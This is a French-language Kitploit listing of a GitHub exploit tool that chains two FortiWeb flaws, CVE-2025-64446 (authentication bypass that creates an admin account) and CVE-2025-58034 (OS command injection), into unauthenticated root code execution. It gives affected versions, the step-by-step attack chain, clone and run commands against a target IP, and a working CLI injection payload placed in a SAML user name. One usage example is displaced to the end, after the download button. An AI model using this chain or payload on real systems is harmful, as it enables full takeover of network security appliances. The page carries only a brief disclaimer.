Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-64446_CVE-2025-58034 — Exploit d'exécution de code à distance (RCE) sur FortiWeb via la chaîne CVE-2025-64446 + CVE-2025-58034 | Kitploit
Outils/GitHubGitHub/lincemorado97/cve-2025-64446_cve-2025-58034
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationRed Teaming

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
lincemorado97/cve-2025-64446_cve-2025-58034

CVE-2025-64446_CVE-2025-58034

Exploit d'exécution de code à distance (RCE) sur FortiWeb via la chaîne CVE-2025-64446 + CVE-2025-58034

Voir le dépôt
145il y a 9 moisPas encore vérifié

Exploitation de l'exécution de code à distance (RCE) FortiWeb via la chaîne CVE-2025-64446 + CVE-2025-58034

Description

Ce script enchaîne deux vulnérabilités critiques de Fortinet FortiWeb pour parvenir à une exécution de code à distance non authentifiée avec les privilèges root :

  1. CVE-2025-64446 – Contournement d'authentification par traversée de chemin relative
    Permet à un attaquant non authentifié de contourner l'authentification et de créer un nouveau compte administratif.

  2. CVE-2025-58034 – Injection de commandes OS authentifiée
    Un attaquant authentifié (à l'aide du compte créé à l'étape 1) peut exécuter des commandes OS arbitraires en tant que root via des requêtes HTTP spécialement conçues.

En combinant ces deux vulnérabilités, un attaquant peut passer d'un accès nul à un compromission totale du système sans aucun identifiant préalable.

Impact final : Exécution de code à distance non authentifiée (équivalent à un shell root)

Détails des vulnérabilités

CVE-2025-64446 – Contournement d'authentification (traversée de chemin relative)

  • Type : Traversée de chemin relative menant à un contournement d'authentification
  • Sévérité : Critique (Score de base CVSS 3.1 : 9,8)
  • Vecteur CVSS : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Versions concernées :
    • FortiWeb 8.0.0 – 8.0.1
    • FortiWeb 7.6.0 – 7.6.4
    • FortiWeb 7.4.0 – 7.4.9
    • FortiWeb 7.2.0 – 7.2.11
    • FortiWeb 7.0.0 – 7.0.11

CVE-2025-58034 – Injection de commandes OS authentifiée

  • CVE : CVE-2025-58034
  • Type : Neutralisation inappropriée d'éléments spéciaux utilisés dans une commande OS (injection de commandes OS) – [CWE-78]
  • Sévérité : Critique
  • Description :
    Un attaquant authentifié peut exécuter des commandes arbitraires du système d'exploitation sur le système sous-jacent via des requêtes HTTP ou des commandes CLI spécialement conçues.
  • Versions concernées (élargies par cette CVE) :
    • FortiWeb 8.0.0 – 8.0.1
    • FortiWeb 7.6.0 – 7.6.5 (note : inclut 7.6.5)
    • FortiWeb 7.4.0 – 7.4.10 (note : inclut 7.4.10)
    • FortiWeb 7.2.0 – 7.2.11
    • FortiWeb 7.0.0 – 7.0.11

Chaîne d'attaque combinée :

  1. Utiliser CVE-2025-64446 → Créer un compte administrateur (non authentifié)
  2. Se connecter avec le compte administrateur nouvellement créé
  3. Utiliser CVE-2025-58034 → Exécuter des commandes OS arbitraires en tant que root

Utilisation

  1. Cloner le dépôt :

    root@kitploit:~
    git clone https://github.com/lincemorado97/CVE-2025-64446_CVE-2025-58034
    cd CVE-2025-64446_CVE-2025-58034
    
  2. Installer les dépendances :

    root@kitploit:~
    pip install -r requirements.txt
    
  3. Exécuter l'exploit complet (crée un administrateur + exécute une commande) :

    root@kitploit:~
    python exploit.py <target_ip> [-u <username>] [-p <password>]
    
    • <target_ip> : l'adresse IP ou le nom d'hôte de l'appliance FortiWeb vulnérable. Il s'agit d'un argument obligatoire.
    • -u <username> (facultatif) : spécifier un nom d'utilisateur personnalisé pour le compte administratif créé. S'il n'est pas fourni, un UUID sera utilisé.
    • -p <password> (facultatif) : spécifier un mot de passe personnalisé pour le compte administratif créé. S'il n'est pas fourni, le nom d'utilisateur sera utilisé comme mot de passe.

    Exemple :

    root@kitploit:~
    python exploit.py 192.168.1.100 -u admin123 -p password456
    

    Cela tentera de créer un compte administratif avec le nom d'utilisateur « admin123 » et le mot de passe « password456 » sur l'appliance cible à 192.168.1.100.

    Si aucun nom d'utilisateur ni mot de passe n'est spécifié :

Démonstration

Étape 1 : Contournement d'authentification et création d'un administrateur (CVE-2025-64446)

exploit

verification

Étape 2 : Exécution de code à distance en tant que root (CVE-2025-58034)

Après s'être connecté avec succès à l'aide du compte administratif nouvellement créé, un attaquant peut exploiter la vulnérabilité d'injection de commandes authentifiée via des requêtes spécialement conçues ou directement via la CLI FortiWeb.

Une méthode d'exploitation fiable consiste à utiliser la commande CLI suivante (exécutée depuis l'interface en ligne de commande FortiWeb après authentification) :

root@kitploit:~
config user saml-user

edit "`<VOTRE COMMANDE>`"

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

root-shell rce-demo

Vérification

Après l'exécution :

  • Vérifier la sortie pour les résultats de la commande (par exemple, uid=0(root) gid=0(root) confirme la RCE root)
  • Se connecter via SSH (si une clé a été ajoutée) ou via l'interface web avec les identifiants créés

Références

  • CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
  • CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
  • Avis PSIRT Fortinet : https://www.fortinet.com/support/psirt
  • Analyse : https://attackerkb.com/topics/zClpINmLCh/cve-2025-58034/rapid7-analysis

Avertissement : Cet outil est fourni uniquement à des fins de tests de sécurité autorisés et d'éducation. Toute utilisation non autorisée contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégale.

Télécharger l’outil
root@kitploit:~
python exploit.py 192.168.1.100

Le script générera un UUID aléatoire pour le nom d'utilisateur et l'utilisera comme mot de passe.